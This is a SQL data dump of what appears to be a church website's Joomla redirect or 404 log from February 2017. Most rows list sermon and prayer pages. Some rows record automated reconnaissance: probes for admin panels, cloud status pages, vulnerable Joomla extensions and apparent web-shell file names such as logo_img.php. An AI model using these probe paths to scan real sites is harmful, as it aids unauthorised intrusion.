(3443, 'https://142.4.21.132/a2billing/admin/Public/index.php', NULL, '', '', 9, 0, '2017-02-05 21:57:52', '0000-00-00 00:00:00', 301),
(3444, 'http://www.lifeoasisinternationalchurch.org/125-prayer-focus-for-day-36', NULL, '', '', 1, 0, '2017-02-06 00:40:10', '0000-00-00 00:00:00', 301),
(3445, 'http://lifeoasisinternationalchurch.org/index.php/tutorials/rev-olusola-ayodele-areogun', NULL, '', '', 2, 0, '2017-02-06 02:15:49', '0000-00-00 00:00:00', 301),
(3446, 'http://www.lifeoasisinternationalchurch.org/prayer/component/content/article/10-2014fasting-prayer/170-day72014', NULL, '', '', 2, 0, '2017-02-06 03:48:21', '0000-00-00 00:00:00', 301),
(3447, 'http://www.lifeoasisinternationalchurch.org/asom-2015', NULL, '', '', 5, 0, '2017-02-06 05:02:28', '0000-00-00 00:00:00', 301),
(3448, 'http://www.lifeoasisinternationalchurch.org/component/jcomments/feed/com_sermonspeaker/13', NULL, '', '', 3, 0, '2017-02-06 07:45:25', '0000-00-00 00:00:00', 301),
(3449, 'https://awc.lifeoasisinternationalchurch.org/nextcloud/status.php', NULL, '', '', 1, 0, '2017-02-06 08:53:00', '0000-00-00 00:00:00', 301),
(3450, 'https://awc.lifeoasisinternationalchurch.org/owncloud/status.php', NULL, '', '', 1, 0, '2017-02-06 08:53:00', '0000-00-00 00:00:00', 301),
(3451, 'https://awc.lifeoasisinternationalchurch.org/oc-shib/status.php', NULL, '', '', 1, 0, '2017-02-06 08:53:00', '0000-00-00 00:00:00', 301),
(3452, 'https://awc.lifeoasisinternationalchurch.org/oc/status.php', NULL, '', '', 1, 0, '2017-02-06 08:53:00', '0000-00-00 00:00:00', 301),
(3453, 'https://awc.lifeoasisinternationalchurch.org/status.php', NULL, '', '', 1, 0, '2017-02-06 08:53:00', '0000-00-00 00:00:00', 301),
(3454, 'http://lifeoasisinternationalchurch.org/ADMINISTRATOR', NULL, '', '', 3, 0, '2017-02-06 09:05:17', '0000-00-00 00:00:00', 301),
(3455, 'http://www.lifeoasisinternationalchurch.org/ADMINISTRATOR', NULL, '', '', 2, 0, '2017-02-06 09:05:35', '0000-00-00 00:00:00', 301),
(3456, 'http://lifeoasisinternationalchurch.org/prayer/126-prayer-focus-for-day-37', NULL, '', '', 1, 0, '2017-02-06 09:17:47', '0000-00-00 00:00:00', 301),
(3457, 'http://lifeoasisinternationalchurch.org/mp3-messages/sermons/0/0?sermon_cat=21&limitstart=0', NULL, 'http://lifeoasisinternationalchurch.org/mp3-messages/sermons/0/0?sermon_cat=21&limitstart=0', '', 1, 0, '2017-02-06 09:27:23', '0000-00-00 00:00:00', 301),
(3458, 'http://lifeoasisinternationalchurch.org/component/jcomments/feed/com_sermonspeaker/24', NULL, '', '', 1, 0, '2017-02-06 10:56:37', '0000-00-00 00:00:00', 301),
(3459, 'http://lifeoasisinternationalchurch.org/prayer/158-focus32-5', NULL, '', '', 1, 0, '2017-02-06 14:41:09', '0000-00-00 00:00:00', 301),
(3460, 'http://www.lifeoasisinternationalchurch.org/mag', NULL, '', '', 2, 0, '2017-02-06 16:23:31', '0000-00-00 00:00:00', 301),
(3461, 'http://www.lifeoasisinternationalchurch.org/cachee/logo_img.php', NULL, 'http://www.lifeoasisinternationalchurch.org/cachee/logo_img.php', '', 2, 0, '2017-02-06 16:31:51', '0000-00-00 00:00:00', 301),
(3462, 'http://www.lifeoasisinternationalchurch.org/template-info/index.php?option=com_content&view=article&id=33:media-outreach&catid=18:loic&Itemid=200', NULL, '', '', 8, 0, '2017-02-06 17:38:14', '0000-00-00 00:00:00', 301),
(3463, 'http://lifeoasisinternationalchurch.org/resources/hd/18-loic/50-young-achievers', NULL, '', '', 4, 0, '2017-02-06 18:25:13', '0000-00-00 00:00:00', 301),
(3464, 'http://www.lifeoasisinternationalchurch.org/resources/10-about-us', NULL, '', '', 3, 0, '2017-02-06 18:59:44', '0000-00-00 00:00:00', 301),
(3465, 'http://www.lifeoasisinternationalchurch.org/index.php/248-day-12-of-21-days-fasting-and-prayer-october', NULL, '', '', 6, 0, '2017-02-06 20:09:08', '0000-00-00 00:00:00', 301),
(3466, 'http://lifeoasisinternationalchurch.org/prayer/81-day-29', NULL, '', '', 2, 0, '2017-02-06 20:57:08', '0000-00-00 00:00:00', 301),
(3467, 'http://lifeoasisinternationalchurch.org/magazine', NULL, '', '', 1, 0, '2017-02-06 23:40:46', '0000-00-00 00:00:00', 301),
(3468, 'http://www.lifeoasisinternationalchurch.org/index.php/133-2014-8', NULL, '', '', 6, 0, '2017-02-07 00:20:11', '0000-00-00 00:00:00', 301),
(3469, 'http://lifeoasisinternationalchurch.org/index.php/277-day-17-of-21-days-fasting-and-prayer-november', NULL, '', '', 3, 0, '2017-02-07 01:15:39', '0000-00-00 00:00:00', 301),
(3470, 'http://lifeoasisinternationalchurch.org/index.php/mp3-messages/sermon/7', NULL, '', '', 1, 0, '2017-02-07 01:23:42', '0000-00-00 00:00:00', 301),
(3471, 'http://lifeoasisinternationalchurch.org/index.php?option=com_content&view=article&id=49&Itemid=238', NULL, '', '', 1, 0, '2017-02-07 05:37:08', '0000-00-00 00:00:00', 301),
(3472, 'http://lifeoasisinternationalchurch.org/finance/registration', NULL, '', '', 1, 0, '2017-02-07 06:09:09', '0000-00-00 00:00:00', 301),
(3473, 'http://www.lifeoasisinternationalchurch.org/prayer/component/content/article/7-kindom-builder/15-prayer-a-fasting-day-6', NULL, '', '', 4, 0, '2017-02-07 06:11:55', '0000-00-00 00:00:00', 301),
(3474, 'http://www.lifeoasisinternationalchurch.org/163-focus21', NULL, '', '', 1, 0, '2017-02-07 09:50:24', '0000-00-00 00:00:00', 301),
(3475, 'http://www.lifeoasisinternationalchurch.org/index.php/226-2016-day-9', NULL, '', '', 8, 0, '2017-02-07 12:16:47', '0000-00-00 00:00:00', 301),
(3476, 'http://lifeoasisinternationalchurch.org/index.php/267-day-7-of-21-days-fasting-and-prayer-november-2', NULL, '', '', 5, 0, '2017-02-07 12:51:36', '0000-00-00 00:00:00', 301),
(3477, 'http://lifeoasisinternationalchurch.org/mp3-messages/speaker/3-rev-mrs-oyenike-areogun/series', NULL, '', '', 4, 0, '2017-02-07 13:13:41', '0000-00-00 00:00:00', 301),
(3478, 'http://www.lifeoasisinternationalchurch.org/index.php/11-kindom-builder/30-prophetic-words-for-day-21', NULL, '', '', 7, 0, '2017-02-07 13:34:02', '0000-00-00 00:00:00', 301),
(3479, 'http://lifeoasisinternationalchurch.org/index.php/11-kindom-builder/35-prayer-a-fasting-day-26', NULL, '', '', 5, 0, '2017-02-07 14:16:44', '0000-00-00 00:00:00', 301),
(3480, 'http://www.lifeoasisinternationalchurch.org/16-prayer-a-fasting-day-7', NULL, '', '', 2, 0, '2017-02-07 14:22:41', '0000-00-00 00:00:00', 301),
(3481, 'http://www.lifeoasisinternationalchurch.org/component/content/article/12-sample-content/19-sample-content-8', NULL, '', '', 4, 0, '2017-02-07 15:15:22', '0000-00-00 00:00:00', 301),
(3482, 'http://lifeoasisinternationalchurch.org/mp3-messages/speaker/2-rev-olusola-ayodele-areogun/series', NULL, '', '', 1, 0, '2017-02-07 15:16:06', '0000-00-00 00:00:00', 301),
(3483, 'http://lifeoasisinternationalchurch.org/index.php/mp3-messages/sermon/30-tapping-into-the-anointing-for-increase-3', NULL, '', '', 1, 0, '2017-02-07 15:37:59', '0000-00-00 00:00:00', 301),
(3484, 'http://lifeoasisinternationalchurch.org/index.php?option=com_content&view=article&id=47&Itemid=189', NULL, '', '', 1, 0, '2017-02-07 15:38:00', '0000-00-00 00:00:00', 301),
(3485, 'http://lifeoasisinternationalchurch.org/160-focus38', NULL, '', '', 1, 0, '2017-02-07 16:00:27', '0000-00-00 00:00:00', 301),
(3486, 'http://lifeoasisinternationalchurch.org/162-focus20', NULL, '', '', 1, 0, '2017-02-07 16:19:24', '0000-00-00 00:00:00', 301),
(3487, 'http://lifeoasisinternationalchurch.org/155-focus32-2', NULL, '', '', 1, 0, '2017-02-07 16:19:25', '0000-00-00 00:00:00', 301),
(3488, 'http://lifeoasisinternationalchurch.org/index.php/269-day-9-of-21-days-fasting-and-prayer-november', NULL, '', '', 2, 0, '2017-02-07 18:43:11', '0000-00-00 00:00:00', 301),
(3489, 'http://lifeoasisinternationalchurch.org/index.php/275-day-15-of-21-days-fasting-and-prayer-november', NULL, '', '', 3, 0, '2017-02-07 18:43:29', '0000-00-00 00:00:00', 301),
(3490, 'http://lifeoasisinternationalchurch.org/index.php/278-day-18-of-21-days-fasting-and-prayer-november', NULL, '', '', 2, 0, '2017-02-07 18:43:53', '0000-00-00 00:00:00', 301),
(3491, 'http://www.lifeoasisinternationalchurch.org/component/jcomments/feed/com_sermonspeaker/5', NULL, 'http://www.lifeoasisinternationalchurch.org/', '', 5, 0, '2017-02-07 19:59:39', '0000-00-00 00:00:00', 301),
(3492, 'http://lifeoasisinternationalchurch.org/contact-us/prayer-request?task=rss&key=d41d8cd98f00b204e9800998ecf8427e', NULL, '', '', 1, 0, '2017-02-07 20:11:24', '0000-00-00 00:00:00', 301),
(3493, 'http://www.lifeoasisinternationalchurch.org/asom2017', NULL, '', '', 2, 0, '2017-02-07 20:29:31', '0000-00-00 00:00:00', 301),
(3494, 'http://www.lifeoasisinternationalchurch.org/index.php/12-sample-content/14-sample-content-3', NULL, '', '', 5, 0, '2017-02-07 20:42:27', '0000-00-00 00:00:00', 301),
(3495, 'http://lifeoasisinternationalchurch.org/index.php/280-day-20-of-21-days-fasting-and-prayer-november', NULL, '', '', 5, 0, '2017-02-07 20:52:46', '0000-00-00 00:00:00', 301),
(3496, 'http://www.lifeoasisinternationalchurch.org/index.php/component/jcomments/feed/com_sermonspeaker/5', NULL, '', '', 2, 0, '2017-02-07 20:59:51', '0000-00-00 00:00:00', 301),
(3497, 'https://prayer.lifeoasisinternationalchurch.org/oc-shib/status.php', NULL, '', '', 1, 0, '2017-02-07 21:04:17', '0000-00-00 00:00:00', 301),
(3498, 'https://prayer.lifeoasisinternationalchurch.org/oc/status.php', NULL, '', '', 1, 0, '2017-02-07 21:04:17', '0000-00-00 00:00:00', 301),
(3499, 'https://prayer.lifeoasisinternationalchurch.org/status.php', NULL, '', '', 1, 0, '2017-02-07 21:04:17', '0000-00-00 00:00:00', 301),
(3500, 'https://prayer.lifeoasisinternationalchurch.org/owncloud/status.php', NULL, '', '', 1, 0, '2017-02-07 21:04:17', '0000-00-00 00:00:00', 301),
(3501, 'https://prayer.lifeoasisinternationalchurch.org/nextcloud/status.php', NULL, '', '', 1, 0, '2017-02-07 21:04:17', '0000-00-00 00:00:00', 301),
(3502, 'http://www.lifeoasisinternationalchurch.org/index.php/151-day-24', NULL, '', '', 6, 0, '2017-02-07 21:36:33', '0000-00-00 00:00:00', 301),
(3503, 'http://lifeoasisinternationalchurch.org/resources/online-bible', NULL, '', '', 1, 0, '2017-02-07 22:03:28', '0000-00-00 00:00:00', 301),
(3504, 'http://www.lifeoasisinternationalchurch.org/index.php?option=com_ccboard', NULL, '', '', 2, 0, '2017-02-07 22:06:23', '0000-00-00 00:00:00', 301),
(3505, 'http://www.lifeoasisinternationalchurch.org/index.php?option=com_agora', NULL, '', '', 2, 0, '2017-02-07 22:06:23', '0000-00-00 00:00:00', 301),
(3506, 'http://www.lifeoasisinternationalchurch.org/index.php?option=com_community', NULL, '', '', 2, 0, '2017-02-07 22:06:23', '0000-00-00 00:00:00', 301),
(3507, 'http://www.lifeoasisinternationalchurch.org/index.php?option=com_comprofiler', NULL, '', '', 2, 0, '2017-02-07 22:06:24', '0000-00-00 00:00:00', 301),
(3508, 'http://www.lifeoasisinternationalchurch.org/index.php?option=com_easybookreloaded', NULL, '', '', 4, 0, '2017-02-07 22:06:24', '0000-00-00 00:00:00', 301),
(3509, 'http://www.lifeoasisinternationalchurch.org/index.php?option=com_ninjaboard', NULL, '', '', 2, 0, '2017-02-07 22:06:24', '0000-00-00 00:00:00', 301),
(3510, 'http://www.lifeoasisinternationalchurch.org/index.php?option=com_k2', NULL, '', '', 2, 0, '2017-02-07 22:06:24', '0000-00-00 00:00:00', 301),
(3511, 'http://www.lifeoasisinternationalchurch.org/index.php?option=com_vitabook', NULL, '', '', 4, 0, '2017-02-07 22:06:24', '0000-00-00 00:00:00', 301),
(3512, 'http://www.lifeoasisinternationalchurch.org/index.php?option=com_sefbook', NULL, '', '', 2, 0, '2017-02-07 22:06:24', '0000-00-00 00:00:00', 301),
(3513, 'http://www.lifeoasisinternationalchurch.org/index.php?option=com_myblog', NULL, '', '', 2, 0, '2017-02-07 22:06:24', '0000-00-00 00:00:00', 301),
(3514, 'http://www.lifeoasisinternationalchurch.org/index.php?option=com_easyblog', NULL, '', '', 2, 0, '2017-02-07 22:06:24', '0000-00-00 00:00:00', 301),
(3515, 'http://www.lifeoasisinternationalchurch.org/index.php?option=com_easygb', NULL, '', '', 4, 0, '2017-02-07 22:06:25', '0000-00-00 00:00:00', 301),
(3516, 'http://www.lifeoasisinternationalchurch.org/index.php?option=com_phocaguestbook', NULL, '', '', 4, 0, '2017-02-07 22:06:25', '0000-00-00 00:00:00', 301),
(3517, 'http://www.lifeoasisinternationalchurch.org/index.php?option=com_fireboard', NULL, '', '', 2, 0, '2017-02-07 22:06:26', '0000-00-00 00:00:00', 301),
(3518, 'http://www.lifeoasisinternationalchurch.org/index.php?option=com_easysocial', NULL, '', '', 2, 0, '2017-02-07 22:06:27', '0000-00-00 00:00:00', 301),
(3519, 'http://www.lifeoasisinternationalchurch.org/index.php?option=com_classifieds', NULL, '', '', 1, 0, '2017-02-07 22:06:28', '0000-00-00 00:00:00', 301),
(3520, 'http://www.lifeoasisinternationalchurch.org/index.php?option=com_kunena', NULL, '', '', 1, 0, '2017-02-07 22:06:28', '0000-00-00 00:00:00', 301),
(3521, 'http://www.lifeoasisinternationalchurch.org/index.php?option=akobook', NULL, '', '', 1, 0, '2017-02-07 22:06:28', '0000-00-00 00:00:00', 301),
(3522, 'http://lifeoasisinternationalchurch.org/resources/kindom-builder', NULL, '', '', 1, 0, '2017-02-07 22:40:31', '0000-00-00 00:00:00', 301),
(3523, 'http://www.lifeoasisinternationalchurch.org/index.php/mp3-messages/speaker/2-rev-olusola-ayodele-areogun/series', NULL, '', '', 4, 0, '2017-02-07 23:18:35', '0000-00-00 00:00:00', 301),
(3524, 'http://www.lifeoasisinternationalchurch.org/index.php/template-info-2/the-church-2', NULL, '', '', 8, 0, '2017-02-08 04:54:39', '0000-00-00 00:00:00', 301),
(3525, 'http://lifeoasisinternationalchurch.org/church-groups', NULL, '', '', 1, 0, '2017-02-08 06:00:24', '0000-00-00 00:00:00', 301),
(3526, 'http://www.lifeoasisinternationalchurch.org/media.html', NULL, '', '', 4, 0, '2017-02-08 06:42:54', '0000-00-00 00:00:00', 301),
(3527, 'http://lifeoasisinternationalchurch.org/component/jcomments/captcha/29072', NULL, '', '', 1, 0, '2017-02-08 13:07:06', '0000-00-00 00:00:00', 301),
(3528, 'http://lifeoasisinternationalchurch.org/index.php?option=com_content&view=article&id=51&Itemid=241', NULL, '', '', 2, 0, '2017-02-08 13:53:15', '0000-00-00 00:00:00', 301),
(3529, 'http://www.lifeoasisinternationalchurch.org/167-focus27', NULL, '', '', 1, 0, '2017-02-08 15:25:02', '0000-00-00 00:00:00', 301),
(3530, 'http://lifeoasisinternationalchurch.org/spiritmeat/index.php/163-channels-of-divine-healing-power-2?month=11&year=2013', NULL, '', '', 1, 0, '2017-02-08 15:59:03', '0000-00-00 00:00:00', 301),
(3531, 'http://www.lifeoasisinternationalchurch.org/index.php/component/jcomments/feed/com_sermonspeaker/1', NULL, '', '', 3, 0, '2017-02-08 16:56:39', '0000-00-00 00:00:00', 301),
(3532, 'http://www.lifeoasisinternationalchurch.org/streamin/', NULL, '', '', 3, 0, '2017-02-08 18:20:21', '0000-00-00 00:00:00', 301),
(3533, 'http://lifeoasisinternationalchurch.org/component/prayercenter/?task=subscribe&Itemid=10111', NULL, '', '', 1, 0, '2017-02-08 19:19:52', '0000-00-00 00:00:00', 301),
(3534, 'http://lifeoasisinternationalchurch.org/index.php/271-day-11-of-21-days-fasting-and-prayer-november', NULL, '', '', 1, 0, '2017-02-08 19:58:47', '0000-00-00 00:00:00', 301),
(3535, 'http://www.lifeoasisinternationalchurch.org/prayer/component/mailto/?tmpl=component&template=prayer5&link=ca247e11981e47370e0c3dd55b2785184392cbf5', NULL, '', '', 1, 0, '2017-02-08 21:55:19', '0000-00-00 00:00:00', 301),
(3536, 'http://www.lifeoasisinternationalchurch.org/component/content/article/7-kindom-builder/49-prophetic-words-for-day-39', NULL, '', '', 6, 0, '2017-02-08 22:22:34', '0000-00-00 00:00:00', 301),
(3537, 'http://www.lifeoasisinternationalchurch.org/index.php/79-prayer-focus-for-day-19', NULL, '', '', 5, 0, '2017-02-08 22:42:47', '0000-00-00 00:00:00', 301),
(3538, 'http://www.lifeoasisinternationalchurch.org/index.php/130-prayer-focus-for-day-7', NULL, '', '', 6, 0, '2017-02-08 22:50:06', '0000-00-00 00:00:00', 301),
(3539, 'http://www.lifeoasisinternationalchurch.org/index.php/233-2016-day-16', NULL, '', '', 6, 0, '2017-02-08 22:53:17', '0000-00-00 00:00:00', 301),
(3540, 'http://www.lifeoasisinternationalchurch.org/index.php/234-2016-day-17', NULL, '', '', 6, 0, '2017-02-08 22:59:17', '0000-00-00 00:00:00', 301),
(3541, 'http://www.lifeoasisinternationalchurch.org/index.php/18-loic/35-trm', NULL, '', '', 4, 0, '2017-02-08 22:59:18', '0000-00-00 00:00:00', 301),
(3542, 'http://www.lifeoasisinternationalchurch.org/index.php/template-info/books', NULL, '', '', 4, 0, '2017-02-08 23:00:12', '0000-00-00 00:00:00', 301),
(3543, 'http://www.lifeoasisinternationalchurch.org/index.php/2012-11-09-09-57-10/2013-gobc-online-registration', NULL, '', '', 2, 0, '2017-02-08 23:00:12', '0000-00-00 00:00:00', 301),
(3544, 'http://www.lifeoasisinternationalchurch.org/index.php/169-prophetic-words-for-day-5', NULL, '', '', 3, 0, '2017-02-08 23:00:13', '0000-00-00 00:00:00', 301),
(3545, 'http://www.lifeoasisinternationalchurch.org/index.php/17-fp-headlines-lists/55-kb-zp', NULL, '', '', 4, 0, '2017-02-08 23:00:14', '0000-00-00 00:00:00', 301),
(3546, 'http://www.lifeoasisinternationalchurch.org/index.php/195-2015-day-20', NULL, '', '', 8, 0, '2017-02-08 23:00:14', '0000-00-00 00:00:00', 301),
(3547, 'http://www.lifeoasisinternationalchurch.org/index.php/154-day-27', NULL, '', '', 6, 0, '2017-02-08 23:00:14', '0000-00-00 00:00:00', 301),
(3548, 'http://www.lifeoasisinternationalchurch.org/index.php/168-prophetic-words-for-day-4', NULL, '', '', 6, 0, '2017-02-08 23:00:16', '0000-00-00 00:00:00', 301),
(3549, 'http://www.lifeoasisinternationalchurch.org/index.php/147-day-20', NULL, '', '', 3, 0, '2017-02-08 23:00:16', '0000-00-00 00:00:00', 301),
(3550, 'http://www.lifeoasisinternationalchurch.org/index.php/137-day-11', NULL, '', '', 5, 0, '2017-02-08 23:00:16', '0000-00-00 00:00:00', 301),
(3551, 'http://www.lifeoasisinternationalchurch.org/index.php/11-kindom-builder/22-prophetic-words-for-day-14', NULL, '', '', 4, 0, '2017-02-08 23:16:56', '0000-00-00 00:00:00', 301),
(3552, 'http://www.lifeoasisinternationalchurch.org/index.php/11-kindom-builder/56-prayer-a-fasting-day-7', NULL, '', '', 8, 0, '2017-02-08 23:16:58', '0000-00-00 00:00:00', 301),
(3553, 'http://www.lifeoasisinternationalchurch.org/index.php/260-day-22-of-22-days-fasting-and-prayer-october-2', NULL, '', '', 9, 0, '2017-02-08 23:20:18', '0000-00-00 00:00:00', 301),
(3554, 'http://www.lifeoasisinternationalchurch.org/index.php/196-2015-day-19', NULL, '', '', 6, 0, '2017-02-08 23:20:20', '0000-00-00 00:00:00', 301),
(3555, 'http://www.lifeoasisinternationalchurch.org/index.php/192-2015-day-16', NULL, '', '', 6, 0, '2017-02-08 23:20:21', '0000-00-00 00:00:00', 301),
(3556, 'http://www.lifeoasisinternationalchurch.org/index.php/219-2016-day-2', NULL, '', '', 7, 0, '2017-02-08 23:20:22', '0000-00-00 00:00:00', 301),
(3557, 'http://www.lifeoasisinternationalchurch.org/index.php/136-day-10', NULL, '', '', 4, 0, '2017-02-08 23:20:23', '0000-00-00 00:00:00', 301),
(3558, 'http://www.lifeoasisinternationalchurch.org/142-2014-13', NULL, '', '', 2, 0, '2017-02-08 23:26:54', '0000-00-00 00:00:00', 301),
(3559, 'http://www.lifeoasisinternationalchurch.org/index.php/11-kindom-builder/18-prayer-a-fasting-day-10', NULL, '', '', 5, 0, '2017-02-08 23:30:00', '0000-00-00 00:00:00', 301),
(3560, 'http://www.lifeoasisinternationalchurch.org/index.php/11-kindom-builder/20-prayer-a-fasting-day-12', NULL, '', '', 4, 0, '2017-02-08 23:30:01', '0000-00-00 00:00:00', 301),
(3561, 'http://www.lifeoasisinternationalchurch.org/index.php/125-prayer-focus-for-day-40', NULL, '', '', 1, 0, '2017-02-08 23:30:08', '0000-00-00 00:00:00', 301),
(3562, 'http://www.lifeoasisinternationalchurch.org/index.php?option=com_sermonspeaker&view=sermons&Itemid=190', NULL, 'http://www.google.com/search?ei=rrObWLH1MeOLgAaV04yICw&q=rev+areogun+olusola+prophetic+lnstructions&oq=rev+areogun+olusola+prophetic+lnstructions&gs_l=mobile-gws-serp.3..30i10k1.794523.809769.0.822451.21.13.0.0.0.0.993.7438.4-3j9j1.13.0....0...1c.1.64.mobile-gws-serp..14.5.3129...41j33i160k1j33i21k1j0i22i30k1.6xV82bSAgzk', '', 6, 0, '2017-02-09 00:27:26', '0000-00-00 00:00:00', 301),
(3563, 'http://www.lifeoasisinternationalchurch.org/index.php/75-prayer-focus-for-day-17', NULL, '', '', 7, 0, '2017-02-09 00:31:32', '0000-00-00 00:00:00', 301),
(3564, 'http://www.lifeoasisinternationalchurch.org/index.php/235-2016-day-18', NULL, '', '', 6, 0, '2017-02-09 00:31:33', '0000-00-00 00:00:00', 301),
(3565, 'http://www.lifeoasisinternationalchurch.org/index.php/264-day-4-of-21-days-fasting-and-prayer-november', NULL, '', '', 7, 0, '2017-02-09 00:41:15', '0000-00-00 00:00:00', 301),
(3566, 'http://www.lifeoasisinternationalchurch.org/index.php/187-2015-day-10', NULL, '', '', 6, 0, '2017-02-09 00:42:43', '0000-00-00 00:00:00', 301),
(3567, 'http://www.lifeoasisinternationalchurch.org/index.php/programme/18-loic/50-young-achievers', NULL, '', '', 6, 0, '2017-02-09 00:42:44', '0000-00-00 00:00:00', 301),
(3568, 'http://www.lifeoasisinternationalchurch.org/index.php/144-day-18', NULL, '', '', 6, 0, '2017-02-09 00:45:36', '0000-00-00 00:00:00', 301),
(3569, 'http://www.lifeoasisinternationalchurch.org/template-info/wimmp', NULL, '', '', 8, 0, '2017-02-09 00:45:36', '0000-00-00 00:00:00', 301),
(3570, 'http://www.lifeoasisinternationalchurch.org/index.php/229-2016-day-12', NULL, '', '', 6, 0, '2017-02-09 00:56:27', '0000-00-00 00:00:00', 301),
(3571, 'http://www.lifeoasisinternationalchurch.org/index.php/171-prophetic-words-for-day-7', NULL, '', '', 8, 0, '2017-02-09 01:07:46', '0000-00-00 00:00:00', 301),
(3572, 'http://www.lifeoasisinternationalchurch.org/index.php/132-prayer-focus-for-day-8', NULL, '', '', 8, 0, '2017-02-09 01:07:47', '0000-00-00 00:00:00', 301),
(3573, 'http://www.lifeoasisinternationalchurch.org/index.php/11-kindom-builder/57-prayer-a-fasting-day-8', NULL, '', '', 7, 0, '2017-02-09 03:56:27', '0000-00-00 00:00:00', 301),
(3574, 'http://lifeoasisinternationalchurch.org/index.php/145-day-19', NULL, '', '', 1, 0, '2017-02-09 03:59:50', '0000-00-00 00:00:00', 301),
(3575, 'http://www.lifeoasisinternationalchurch.org/index.php/199-2015-day-24', NULL, '', '', 7, 0, '2017-02-09 05:42:41', '0000-00-00 00:00:00', 301),
(3576, 'http://www.lifeoasisinternationalchurch.org/streamingss', NULL, '', '', 1, 0, '2017-02-09 06:57:37', '0000-00-00 00:00:00', 301),
(3577, 'http://lifeoasisinternationalchurch.org/index.php/60-prophetic-words-for-day-1', NULL, '', '', 5, 0, '2017-02-09 06:58:38', '0000-00-00 00:00:00', 301),
(3578, 'http://www.lifeoasisinternationalchurch.org/resources/\' + $href + \'', NULL, 'http://www.lifeoasisinternationalchurch.org/resources/downloads', '', 1, 0, '2017-02-09 07:32:34', '0000-00-00 00:00:00', 301),
(3579, 'http://www.lifeoasisinternationalchurch.org/loicgallery/modules/remote/', NULL, '', '', 3, 0, '2017-02-09 08:53:09', '0000-00-00 00:00:00', 301),
(3580, 'http://www.lifeoasisinternationalchurch.org/cache/js-ed9506a1a0d7f94f3a04d72debddb510.php', NULL, 'http://www.lifeoasisinternationalchurch.org/resources/stream', '', 1, 0, '2017-02-09 09:30:57', '0000-00-00 00:00:00', 301),
(3581, 'http://www.lifeoasisinternationalchurch.org/libraries/gantry/css/css-b825f3c52f788bffb336b70841e64d5d.php', NULL, 'http://www.lifeoasisinternationalchurch.org/streaming', '', 22, 0, '2017-02-09 13:09:40', '0000-00-00 00:00:00', 301),
(3582, 'http://www.lifeoasisinternationalchurch.org/cache/js-3ea88f7927eba2e8243e9ba89ef62c50.php', NULL, 'http://www.lifeoasisinternationalchurch.org/streaming', '', 21, 0, '2017-02-09 13:09:40', '0000-00-00 00:00:00', 301),
(3583, 'http://www.lifeoasisinternationalchurch.org/component/content/article/12-sample-content/16-sample-content-5', NULL, '', '', 2, 0, '2017-02-09 16:56:37', '0000-00-00 00:00:00', 301),
(3584, 'http://www.lifeoasisinternationalchurch.org/administrator/backups/logo_img.php', NULL, 'http://www.lifeoasisinternationalchurch.org/administrator/backups/logo_img.php', '', 1, 0, '2017-02-09 17:34:06', '0000-00-00 00:00:00', 301),
(3585, 'http://www.lifeoasisinternationalchurch.org/prayer/component/content/article/7-kindom-builder/30-prophetic-words-for-day-21', NULL, '', '', 1, 0, '2017-02-09 19:45:12', '0000-00-00 00:00:00', 301),
(3586, 'http://www.lifeoasisinternationalchurch.org/streaming;', NULL, '', '', 2, 0, '2017-02-09 19:54:15', '0000-00-00 00:00:00', 301),
(3587, 'http://lifeoasisinternationalchurch.org/index.php/158-day-30', NULL, '', '', 1, 0, '2017-02-09 20:19:46', '0000-00-00 00:00:00', 301),
(3588, 'http://lifeoasisinternationalchurch.org/index.php/173-day-9', NULL, '', '', 1, 0, '2017-02-09 21:16:14', '0000-00-00 00:00:00', 301),
(3589, 'http://www.lifeoasisinternationalchurch.org/15-prayer-a-fasting-day-6', NULL, '', '', 3, 0, '2017-02-09 22:20:28', '0000-00-00 00:00:00', 301),
(3590, 'http://lifeoasisinternationalchurch.org/component/jcomments/feed/com_sermonspeaker/21', NULL, '', '', 2, 0, '2017-02-09 23:40:02', '0000-00-00 00:00:00', 301),
(3591, 'http://www.lifeoasisinternationalchurch.org/component/content/article/7-kindom-builder/18-prayer-a-fasting-day', NULL, '', '', 2, 0, '2017-02-10 02:51:36', '0000-00-00 00:00:00', 301),
(3592, 'http://www.lifeoasisinternationalchurch.org//index.php?option=com_kide', NULL, '', '', 2, 0, '2017-02-10 05:06:02', '0000-00-00 00:00:00', 301),
(3593, 'http://lifeoasisinternationalchurch.org/resources/kindom-builder/14-contact-us', NULL, '', '', 1, 0, '2017-02-10 09:23:22', '0000-00-00 00:00:00', 301),
(3594, 'http://lifeoasisinternationalchurch.org/admin/index.php', NULL, '', '', 2, 0, '2017-02-10 11:07:58', '0000-00-00 00:00:00', 301),
(3595, 'http://lifeoasisinternationalchurch.org/169-focus38-2', NULL, '', '', 1, 0, '2017-02-10 15:04:54', '0000-00-00 00:00:00', 301),
(3596, 'http://lifeoasisinternationalchurch.org/index.php/183-2015-day-7', NULL, '', '', 1, 0, '2017-02-10 15:05:01', '0000-00-00 00:00:00', 301),
(3597, 'http://lifeoasisinternationalchurch.org/index.php/195-2015-day-20', NULL, '', '', 1, 0, '2017-02-10 15:05:02', '0000-00-00 00:00:00', 301),
(3598, 'http://lifeoasisinternationalchurch.org/index.php/mp3-messages/sermon/7-enemies-of-gods-word-1', NULL, '', '', 2, 0, '2017-02-10 15:12:34', '0000-00-00 00:00:00', 301),
(3599, 'http://lifeoasisinternationalchurch.org/index.php/11-kindom-builder/52-prayer-a-fasting-day-4', NULL, '', '', 3, 0, '2017-02-10 15:17:11', '0000-00-00 00:00:00', 301),
(3600, 'http://lifeoasisinternationalchurch.org/index.php/12-sample-content/16-sample-content-5', NULL, '', '', 1, 0, '2017-02-10 15:17:12', '0000-00-00 00:00:00', 301),
(3601, 'http://lifeoasisinternationalchurch.org/index.php/189-2015-day-12', NULL, '', '', 1, 0, '2017-02-10 15:17:13', '0000-00-00 00:00:00', 301),
(3602, 'http://lifeoasisinternationalchurch.org/index.php/194-2015-day-18', NULL, '', '', 1, 0, '2017-02-10 15:17:13', '0000-00-00 00:00:00', 301),
(3603, 'http://lifeoasisinternationalchurch.org/index.php/198-2015-day-23', NULL, '', '', 2, 0, '2017-02-10 15:17:14', '0000-00-00 00:00:00', 301),
(3604, 'http://www.lifeoasisinternationalchurch.org/logs/logo_img.php', NULL, 'http://www.lifeoasisinternationalchurch.org/logs/logo_img.php', '', 2, 0, '2017-02-10 16:18:48', '0000-00-00 00:00:00', 301),
(3605, 'http://www.lifeoasisinternationalchurch.org/cli/logo_img.php', NULL, 'http://www.lifeoasisinternationalchurch.org/cli/logo_img.php', '', 2, 0, '2017-02-10 16:18:47', '0000-00-00 00:00:00', 301),
